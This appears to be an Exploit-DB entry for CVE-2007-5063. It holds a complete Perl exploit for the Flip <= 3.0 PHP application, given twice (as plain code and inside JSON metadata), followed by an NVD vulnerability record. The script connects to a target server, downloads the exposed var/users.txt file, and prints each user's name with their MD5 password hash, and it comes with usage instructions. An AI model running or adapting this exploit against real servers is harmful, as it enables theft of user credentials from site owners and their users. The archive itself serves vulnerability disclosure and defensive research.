ID EDB-ID:4436Type exploitdbReporter undefined1_Modified 2007-09-20T00:00:00
Description
Flip <= 3.0 Remote Password Hash Disclosure Exploit. CVE-2007-5063. Webapps exploit for php platform
#!/usr/bin/perl
use strict;
use IO::Socket;
my $app = "Flip <= 3.0";
my $type = "Passwords Hash Disclosure";
my $author = "undefined1_";
my $vendor = "http://sourceforge.net/projects/flipsource";
banner();
my $server = shift || usage();
my $port = shift || usage();
if($server =~ /http:\/\//)
{
$server = substr($server,7);
}
my $path = "/";
if(index($server, "/") != -1)
{
$path = substr($server, index($server, "/"));
$server = substr($server, 0, index($server, "/"));
if(substr($path, length($path)-1) ne "/") {
$path .= "/";
}
}
my $data = get($server, $port, $path."var/users.txt", "");
fail() unless $data !~ /404 Not Found/;
my $index1 = index($data, "\r\n\r\n");
fail() unless $index1 >= 0;
$data = substr($data, $index1+4);
$index1 = 0;
printf ("%-20s %-32s\n", "username", "md5 hash");
while(($index1 = index($data, "\n")) >= 0)
{
my $hash = substr($data, 0, 32);
my $index2 = index($data, "][");
my $index3 = index($data, "][", $index2+2);
my $user = "";
if($index2 >= 0 && $index3 >= 0)
{
$user = substr($data, $index2+2, $index3-($index2+2));
}
printf ("%-20s %-32s\n", $user, $hash);
$data = substr($data, $index1+1);
}
###################
sub get(\$,\$,\$,\$) {
my $server = shift;
my $port = shift;
my $page = shift;
my $cookies = shift;
my $query = "GET $page HTTP/1.1\r\n";
if($port != 80)
{
$query .= "Host: $server:$port\r\n";
}
else
{
$query .= "Host: $server\r\n";
}
$query .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\r\n";
$query .= "Connection: close\r\n";
$query .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
$query .= "Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
$query .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
if(length($cookies))
{
$query .= "Cookie: ".$cookies."\r\n";
}
$query .= "\r\n";
return sendpacket($server, $port, $query);
}
sub sendpacket(\$,\$,\$) {
my $server = shift;
my $port = shift;
my $query = shift;
my $sock = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => $server, PeerPort => $port)
or die "[-] Could not connect to $server:$port $!\n";
print $sock $query;
my $data = "";
my $answer;
while($answer = <$sock>)
{
$data .= $answer;
}
close($sock);
return $data;
}
###################
sub fail() {
print "[-] exploit failed\n";
exit;
}
sub banner() {
print ":: Flip <= 3.0 password hash disclosure exploit\n";
print ":: by undefined1_ @ www.undef1.com\n\n\n";
}
sub usage() {
print "usage : ./flip_pass.pl <target> <port>\n";
print "example: ./flip_pass.pl www.abcd.com/flip/ 80\n";
exit;
}
# milw0rm.com [2007-09-20]
{"id": "EDB-ID:4436", "hash": "1a923ff094dee3c93572def6cef96281", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Flip <= 3.0 - Remote Password Hash Disclosure Exploit", "description": "Flip <= 3.0 Remote Password Hash Disclosure Exploit. CVE-2007-5063. Webapps exploit for php platform", "published": "2007-09-20T00:00:00", "modified": "2007-09-20T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/4436/", "reporter": "undefined1_", "references": [], "cvelist": ["CVE-2007-5063"], "lastseen": "2016-01-31T20:55:08", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2016-01-31T20:55:08"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-5063"]}], "modified": "2016-01-31T20:55:08"}, "vulnersScore": 5.7}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/4436/", "sourceData": "#!/usr/bin/perl\n\nuse strict; \nuse IO::Socket;\n\nmy $app = \"Flip <= 3.0\";\nmy $type = \"Passwords Hash Disclosure\";\nmy $author = \"undefined1_\";\nmy $vendor = \"http://sourceforge.net/projects/flipsource\";\n\nbanner();\nmy $server = shift || usage();\nmy $port = shift || usage();\n\nif($server =~ /http:\\/\\//)\n{\n\t$server = substr($server,7);\n}\n\nmy $path = \"/\";\nif(index($server, \"/\") != -1)\n{\n\t$path = substr($server, index($server, \"/\"));\n\t$server = substr($server, 0, index($server, \"/\"));\n\tif(substr($path, length($path)-1) ne \"/\") {\n\t\t$path .= \"/\";\n\t}\n}\n\nmy $data = get($server, $port, $path.\"var/users.txt\", \"\");\nfail() unless $data !~ /404 Not Found/;\nmy $index1 = index($data, \"\\r\\n\\r\\n\");\nfail() unless $index1 >= 0;\n\n$data = substr($data, $index1+4);\n$index1 = 0;\nprintf (\"%-20s %-32s\\n\", \"username\", \"md5 hash\");\nwhile(($index1 = index($data, \"\\n\")) >= 0)\n{\t\n\tmy $hash = substr($data, 0, 32);\n\tmy $index2 = index($data, \"][\");\n\tmy $index3 = index($data, \"][\", $index2+2);\n\tmy $user = \"\";\n\tif($index2 >= 0 && $index3 >= 0)\n\t{\n\t\t$user = substr($data, $index2+2, $index3-($index2+2));\n\t}\n\tprintf (\"%-20s %-32s\\n\", $user, $hash);\n\t$data = substr($data, $index1+1);\n}\n\n###################\n\nsub get(\\$,\\$,\\$,\\$) {\n\tmy $server = shift;\n\tmy $port = shift;\n\tmy $page = shift;\n\tmy $cookies = shift;\n\tmy $query = \"GET $page HTTP/1.1\\r\\n\";\n\tif($port != 80)\n\t{\n\t\t$query .= \"Host: $server:$port\\r\\n\";\n\t}\n\telse\n\t{\n\t\t$query .= \"Host: $server\\r\\n\";\n\t}\n\n\t$query .= \"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\\r\\n\";\n\t$query .= \"Connection: close\\r\\n\";\n\t$query .= \"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\\r\\n\";\n\t$query .= \"Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3\\r\\n\";\n\t$query .= \"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\";\t\n\t\n\tif(length($cookies))\n\t{\n\t\t$query .= \"Cookie: \".$cookies.\"\\r\\n\";\n\t}\t\t\t\n\n\t$query .= \"\\r\\n\";\n\treturn sendpacket($server, $port, $query);\n}\n\n\n\n\n\nsub sendpacket(\\$,\\$,\\$) {\n\tmy $server = shift;\n\tmy $port = shift;\n\tmy $query = shift;\n\tmy $sock = IO::Socket::INET->new(Proto => \"tcp\", \n\t\t\t\tPeerAddr => $server, PeerPort => $port) \n\t\t\t\tor die \"[-] Could not connect to $server:$port $!\\n\";\n\tprint $sock $query;\n\tmy $data = \"\";\n\tmy $answer;\n\twhile($answer = <$sock>)\n\t{\n\t\t$data .= $answer;\n\t}\n\n\tclose($sock);\n\treturn $data;\n}\n\n\n\n###################\n\n\n\nsub fail() {\n\tprint \"[-] exploit failed\\n\";\n\texit;\n}\n\n\n\nsub banner() {\n\tprint \":: Flip <= 3.0 password hash disclosure exploit\\n\";\n\tprint \":: by undefined1_ @ www.undef1.com\\n\\n\\n\";\n}\n\n\n\nsub usage() {\n\tprint \"usage : ./flip_pass.pl <target> <port>\\n\";\n\tprint \"example: ./flip_pass.pl www.abcd.com/flip/ 80\\n\";\n\texit;\n}\n\n# milw0rm.com [2007-09-20]\n", "osvdbidlist": ["41903"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:01", "bulletinFamily": "NVD", "description": "Adam Scheinberg Flip 3.0 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a file containing login credentials via a direct request for var/users.txt.", "modified": "2017-09-29T01:29:00", "id": "CVE-2007-5063", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5063", "published": "2007-09-24T22:17:00", "title": "CVE-2007-5063", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
